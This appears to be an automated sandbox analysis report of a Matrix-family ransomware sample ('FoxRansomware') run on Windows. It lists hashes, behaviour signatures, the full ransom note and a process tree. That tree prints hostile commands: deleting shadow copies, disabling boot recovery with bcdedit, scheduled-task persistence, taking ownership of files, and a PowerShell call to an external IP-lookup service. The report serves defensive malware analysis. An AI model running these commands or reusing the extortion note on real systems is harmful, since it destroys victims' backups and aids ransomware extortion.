Overview

overview

10

Static

static

3

FoxRansomw...65.exe

windows7-x64

10

FoxRansomw...65.exe

windows10-2004-x64

10

FoxRansomw...a7.exe

windows7-x64

10

FoxRansomw...a7.exe

windows10-2004-x64

10

FoxRansomw...20.exe

windows7-x64

10

FoxRansomw...20.exe

windows10-2004-x64

10

FoxRansomw...0b.exe

windows7-x64

10

FoxRansomw...0b.exe

windows10-2004-x64

10

FoxRansomw...53.exe

windows7-x64

10

FoxRansomw...53.exe

windows10-2004-x64

10

FoxRansomw...b1.exe

windows7-x64

10

FoxRansomw...b1.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    34s
  • max time network
    37s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-02-2024 05:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

  • Size

    1.2MB

  • MD5

    907636b28d162f7110b067a8178fa38c

  • SHA1

    048ae4691fe267e7c8d9eda5361663593747142a

  • SHA256

    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

  • SHA512

    501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

  • SSDEEP

    24576:R/SA+2lraRrjSJR5ezmT1dM9tZBb5t+wb8fq/81mkvfW:3XlayIsy81hvf

Score
10/10
matrixdiscoveryevasionpersistenceransomwareupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#CORE_README#.rtf

Ransom Note
{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 0D5953D6225CDE85\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 0D5953D6225CDE85\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 CkSy7y3E\cf0\f1\fs32\lang1049\par \par }
Emails
URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

    ransomwarematrix
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Enumerates connected drives 3 TTPs 44 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe"
    1⤵
    • Matrix Ransomware
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:2764
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWHeArfD.exe"
      2⤵
        PID:1524
      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWHeArfD.exe
        "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWHeArfD.exe" -n
        2⤵
        • Executes dropped EXE
        PID:1828
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\JBQVODeU.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1304
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4900
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\WS8smXz0.vbs"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:8
        • C:\Windows\SysWOW64\wscript.exe
          wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\WS8smXz0.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:7128
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\up21cGFf.bat" /sc minute /mo 5 /RL HIGHEST /F
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4292
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\up21cGFf.bat" /sc minute /mo 5 /RL HIGHEST /F
              5⤵
              • Creates scheduled task(s)
              PID:4016
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:5280
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Run /I /tn DSHCA
              5⤵
                PID:7056
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\hQne0weC.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1968
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\hQne0weC.bmp" /f
            3⤵
            • Sets desktop wallpaper using registry
            PID:2088
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
            3⤵
              PID:2896
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
              3⤵
                PID:4232
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mRDZlhzx.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:5768
              • C:\Windows\SysWOW64\attrib.exe
                attrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
                3⤵
                • Views/modifies file attributes
                PID:1784
              • C:\Windows\SysWOW64\cacls.exe
                cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
                3⤵
                  PID:4020
                • C:\Windows\SysWOW64\takeown.exe
                  takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
                  3⤵
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:6824
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c j3MxuEwf.exe -accepteula "store.db" -nobanner
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5384
                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\j3MxuEwf.exe
                    j3MxuEwf.exe -accepteula "store.db" -nobanner
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:5780
                    • C:\Users\Admin\AppData\Local\Temp\j3MxuEwf64.exe
                      j3MxuEwf.exe -accepteula "store.db" -nobanner
                      5⤵
                      • Drops file in Drivers directory
                      • Sets service image path in registry
                      • Executes dropped EXE
                      • Enumerates connected drives
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: LoadsDriver
                      • Suspicious use of AdjustPrivilegeToken
                      PID:6252
            • C:\Windows\SYSTEM32\cmd.exe
              C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\up21cGFf.bat"
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:6208
              • C:\Windows\system32\vssadmin.exe
                vssadmin Delete Shadows /All /Quiet
                2⤵
                • Interacts with shadow copies
                PID:3956
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic SHADOWCOPY DELETE
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:5360
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:6884
                • C:\Windows\system32\vssadmin.exe
                  "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                  3⤵
                  • Interacts with shadow copies
                  PID:6464
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy ignoreallfailures
                2⤵
                • Modifies boot configuration data using bcdedit
                PID:6508
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled No
                2⤵
                • Modifies boot configuration data using bcdedit
                PID:5468
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Delete /TN DSHCA /F
                2⤵
                  PID:4688
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:6544

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#CORE_README#.rtf
                Filesize

                8KB

                MD5

                914fcec25f99807c89a5b611d6c3a7cf

                SHA1

                4d684135020b7a70530b618d81258da246913149

                SHA256

                8b20cb111ea2734c372d6b6e08006b34a2b3757a698201aba06b882a4d3e1bb2

                SHA512

                3085ec2969f8f9520df9cb6461252e4bd226c6357b5899ff070ab63528e7a2f76c280b19bcef87c3df5d7b929d78c0fd26ba7adab70fba13e6be6f2c2dc639d4

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                16KB

                MD5

                1052ddf06b008f80d450046b086a8807

                SHA1

                0229454304e7ba2431f735eb1f8ff81b71cf56b7

                SHA256

                5ba061eac1cefcf0c52982f58e3f71a7ec6c437676736351b41e6f1065a8f6af

                SHA512

                9f930e1e6560a5d6f4621cf3dd5d6b7e4315c4a45e67175fde78761573456aaf376d91ea3557eb5a9c843f45b84ce2d79946e6623c9ccbd21cf08d7d31d9b244

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\JBQVODeU.txt
                Filesize

                14B

                MD5

                c74dacdd9331a6698efffe81ff66ac08

                SHA1

                79e8ce4bb5cc2436e95fad4a74a31aee7aa63043

                SHA256

                82ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c

                SHA512

                24620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWHeArfD.exe
                Filesize

                1.2MB

                MD5

                907636b28d162f7110b067a8178fa38c

                SHA1

                048ae4691fe267e7c8d9eda5361663593747142a

                SHA256

                6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

                SHA512

                501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_0D5953D6225CDE85.txt
                Filesize

                10KB

                MD5

                401159f2d991d977447e68bb94392012

                SHA1

                965f0f99942defe070a891f28c14770456c0daa6

                SHA256

                acae4a3af173f36cdf1051fa53b7d6946f6649c662706af8075fabede01d8e00

                SHA512

                37f2aa6b66862d889a61a56d6ccb672bb55e825b2104d6b996bdc6afa01fc3061ff05ee4d13484b8b6d222d497a8c436d6fb77432409c56eb4dc32a3411788c3

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\j3MxuEwf.exe
                Filesize

                181KB

                MD5

                2f5b509929165fc13ceab9393c3b911d

                SHA1

                b016316132a6a277c5d8a4d7f3d6e2c769984052

                SHA256

                0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                SHA512

                c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mRDZlhzx.bat
                Filesize

                246B

                MD5

                def955437bb2dc6df2b4346a00870ab1

                SHA1

                910db255a9176565c0e05e7522978e9afe08eb09

                SHA256

                980acf75f30a2ce3a89ddfa6477c4d170f2367ebe05a16e96b3150f0f80c4bc5

                SHA512

                decbe95082c0b112194abaa8765fe28639ab5ea01983beee665c0dcbc686949c2266b6b315ed35afd56a84fb006c6d41487196ce673a33582d87bd9b0338fd06

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dt2pnijs.5wc.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\j3MxuEwf64.exe
                Filesize

                221KB

                MD5

                3026bc2448763d5a9862d864b97288ff

                SHA1

                7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                SHA256

                7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                SHA512

                d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                Download Submit

              • C:\Users\Admin\AppData\Roaming\WS8smXz0.vbs
                Filesize

                260B

                MD5

                2b026ff5efe4898e1519582871bd46ea

                SHA1

                35b797ba64720a2cd12ed9928c9f443984aa537f

                SHA256

                108a3a749667a0fb80834085d9e8ef6cb631895b0635ab418879a792b88c7cb0

                SHA512

                2a2c87b6260b6591ad1be8a8d3ed9ec49f402ab4211b20e67440a89b315c315e5c9f9823af93028fa2c6553c95e5b41cb7285ba670a9a46f41bf0270efb64fb5

                Download Submit

              • C:\Users\Admin\AppData\Roaming\up21cGFf.bat
                Filesize

                415B

                MD5

                f3eb1bece5c8267cee9dd890dc426f6c

                SHA1

                1b2f74c253047757568ed839dc788cd3d7041611

                SHA256

                80444e0f1551b7098a277546dd473574613ef0bd5490fd825be861c322c61b10

                SHA512

                a37969585b44bf95e313bc685fe9e0bf884a34900d1a7d85adceaae639de5536b416f2e92d7b3659328a5a91f3fca41fc57214ec1829b73ea324797bae53f22d

                Download Submit

              • memory/1828-14394-0x0000000000400000-0x000000000053B000-memory.dmp

                Filesize

                1.2MB

                Download

              • memory/1828-8580-0x0000000000400000-0x000000000053B000-memory.dmp

                Filesize

                1.2MB

                Download

              • memory/2764-8579-0x0000000000400000-0x000000000053B000-memory.dmp

                Filesize

                1.2MB

                Download

              • memory/2764-14393-0x0000000000400000-0x000000000053B000-memory.dmp

                Filesize

                1.2MB

                Download

              • memory/2764-14380-0x0000000000400000-0x000000000053B000-memory.dmp

                Filesize

                1.2MB

                Download

              • memory/4900-14-0x0000000005950000-0x00000000059B6000-memory.dmp

                Filesize

                408KB

                Download

              • memory/4900-8-0x0000000073FF0000-0x00000000747A0000-memory.dmp

                Filesize

                7.7MB

                Download

              • memory/4900-12-0x0000000004FD0000-0x0000000004FF2000-memory.dmp

                Filesize

                136KB

                Download

              • memory/4900-11-0x0000000005240000-0x0000000005868000-memory.dmp

                Filesize

                6.2MB

                Download

              • memory/4900-24-0x00000000059C0000-0x0000000005D14000-memory.dmp

                Filesize

                3.3MB

                Download

              • memory/4900-9-0x00000000026A0000-0x00000000026B0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4900-31-0x0000000073FF0000-0x00000000747A0000-memory.dmp

                Filesize

                7.7MB

                Download

              • memory/4900-7-0x0000000002630000-0x0000000002666000-memory.dmp

                Filesize

                216KB

                Download

              • memory/4900-10-0x00000000026A0000-0x00000000026B0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4900-28-0x0000000006460000-0x000000000647A000-memory.dmp

                Filesize

                104KB

                Download

              • memory/4900-27-0x00000000075C0000-0x0000000007C3A000-memory.dmp

                Filesize

                6.5MB

                Download

              • memory/4900-13-0x00000000058E0000-0x0000000005946000-memory.dmp

                Filesize

                408KB

                Download

              • memory/4900-25-0x0000000005F70000-0x0000000005F8E000-memory.dmp

                Filesize

                120KB

                Download

              • memory/4900-26-0x0000000005F90000-0x0000000005FDC000-memory.dmp

                Filesize

                304KB

                Download

              • memory/5780-14385-0x0000000000400000-0x0000000000477000-memory.dmp

                Filesize

                476KB

                Download

